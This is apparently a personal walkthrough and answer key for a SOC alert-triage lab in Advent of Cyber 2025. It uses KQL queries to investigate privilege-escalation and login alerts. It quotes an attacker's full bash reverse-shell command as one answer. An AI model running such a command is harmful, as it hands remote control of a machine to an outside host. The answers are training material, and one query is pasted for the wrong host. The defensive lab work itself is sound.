SOC Alert Triaging - Tinsel Triage | Advent of Cyber 2025 - Day 10
This guide contains the answer and steps necessary to get to them for the SOC Alert Triaging - Tinsel Triage room.
Table of contents
Investigation Proper
-
How many entities are affected by the Linux PrivEsc - Polkit Exploit Attempt alert?
It may take a while to get access to the lab environment, so keep that in mind. It took a while for me as well. When you have access, make sure to configure the lab as described in the text.
For me the incidents and rules wouldn't load. It have tried it multiple times without success. I will try again later, when things quiet down a little.
It seems they have changed somethings in the room. Instead of joining and configuring a lab. You can log into a setup lab. This seems to work much better.
Navigating to the incidents tab, we can now see all the incidents. Lets filter them on the "polkit" program. If we open one of these incidents, we can see how many entities these are related to.
Click for answer
10 -
What is the severity of the Linux PrivEsc - Sudo Shadow Access alert?
For this question we filter the list on "shadow". The first column will give us its severity.
Click for answer
High -
How many accounts were added to the sudoers group in the Linux PrivEsc - User Added to Sudo Group alert?
For this answer we can filter the list on "user added". This will give us many events and alerts, so we should look at the affected entities. These however contain not only accounts, but also systems.
So we select to view all entities. In the next window we filter the entities list on "account".
Click for answer
4
Diving Deeper Into Logs
-
What is the name of the kernel module installed in websrv-01?
Filter the incidents on "kernel" and select all events in the details tab.
Here we can see a few events that list the name of the kernel that was inserted.
Click for answer
malicious_mod.ko -
What is the unusual command executed within websrv-01 by the ops user?
We can change the KQL query to look at events from 'websrv-01'.
// The query_now parameter represents the time (in UTC) at which the scheduled analytics rule ran to produce this alert. set query_now = datetime(2025-12-12T03:28:52.0545899Z); Syslog_CL | where host_s == 'websrv-01' | project TimeGenerated, host_s, Message
Here we can see an unusual command being issued.
Click for answer
/bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1 -
What is the source IP address of the first successful SSH login to storage-01?
We will use a different KQL query this time:
set query_now = datetime(2025-10-30T05:09:25.9886229Z); Syslog_CL | where host_s == 'storage-01' and Message has 'sshd' | project _timestamp_t, host_s, Message
There is one entry here with a source IP address.
Click for answer
172.16.0.12 -
What is the external source IP that successfully logged in as root to app-01?
For this question we will look at events where the host is "app-01" and the message contains "root"
set query_now = datetime(2025-10-30T05:09:25.9886229Z); Syslog_CL | where host_s == 'storage-01' and Message has 'sshd' | project _timestamp_t, host_s, Message
Here we see two IP addresses of which one is a private IP and the other a public IP.
Click for answer
203.0.113.45 -
Aside from the backup user, what is the name of the user added to the sudoers group inside app-01?
For this question we change our query to filter events where the message contains "user".
set query_now = datetime(2025-10-30T05:09:25.9886229Z); Syslog_CL | where host_s == 'app-01' and Message has 'user' | project _timestamp_t, host_s, Message
Click for answer
deploy